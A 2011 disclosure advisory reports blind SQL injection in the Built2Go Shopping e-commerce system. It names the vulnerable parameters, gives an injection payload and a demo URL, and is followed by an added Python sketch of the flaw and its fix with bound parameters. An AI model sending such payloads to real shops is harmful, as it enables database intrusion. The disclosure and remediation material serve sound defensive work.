Built2Go Shopping suffers from a remote blind SQL injection vulnerability.
# Exploit Title: Built2Go Shopping (E-Commerce System) Blind SQL Injection
# Date: 2011
# Author: Eyup CELIK
# Version: All versions
# Tested on: All versions are vulnerable
ISSUE
Blind SQL injection is possible through user-supplied request parameters.
Vulnerable Pages:
search.php
product.php
Example:
search.php?searchword=&sitecatid=<Blind SQL Injection>
product.php?cat=<Blind SQL Injection>
Exploit:
cat=15' and '3'='3
Demo:
http://demos.built2go.com/shopping/1/product.php?cat=15%27%20and%20%273%27=%273
Thanks,
Eyup CELIK
Information Technologies Security Specialist
http://www.eyupcelik.com.tr
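
Added example, not part of the original advisory and not Built2Go's code (its PHP source is not shown here): a Python/sqlite3 sketch of why the quoted `cat` value above is evaluated as SQL when a query is built by string concatenation, and how a bound parameter plus integer validation closes it. The table, columns and function names are assumptions and the rows are constructed sample data.

```python
import sqlite3

ADVISORY_VALUE = "15' and '3'='3"  # the cat value quoted in the advisory


def make_db():
    # Constructed sample data; schema is an assumption, not Built2Go's.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, cat INTEGER, name TEXT)")
    db.executemany("INSERT INTO products (cat, name) VALUES (?, ?)",
                   [(15, "Lamp"), (15, "Desk"), (16, "Chair")])
    return db


def products_concat(db, raw):
    """'Before' pattern: the request value is pasted inside a quoted literal."""
    sql = "SELECT name FROM products WHERE cat = '" + raw + "' ORDER BY id"
    return [row[0] for row in db.execute(sql)]


def products_bound(db, raw):
    """The value is bound as data, so the driver never parses it as SQL."""
    sql = "SELECT name FROM products WHERE cat = ? ORDER BY id"
    return [row[0] for row in db.execute(sql, (raw,))]


def parse_cat(raw):
    """Defence in depth: a category id is a short run of ASCII digits."""
    if not (raw.isascii() and raw.isdigit() and len(raw) <= 9):
        raise ValueError("invalid category id")
    return int(raw)


def products_hardened(db, raw):
    """Validate first, then bind; malformed ids are rejected before the query."""
    return products_bound(db, parse_cat(raw))


if __name__ == "__main__":
    db = make_db()
    print(products_concat(db, "15"))            # normal request
    print(products_concat(db, ADVISORY_VALUE))  # same rows: the tail ran as SQL
    print(products_bound(db, ADVISORY_VALUE))   # no rows: compared as one value
    try:
        products_hardened(db, ADVISORY_VALUE)
    except ValueError as exc:
        print("rejected:", exc)
```

Identical output for the first two calls is the signal that request text reached the SQL parser; the same fix applies to `sitecatid` in search.php.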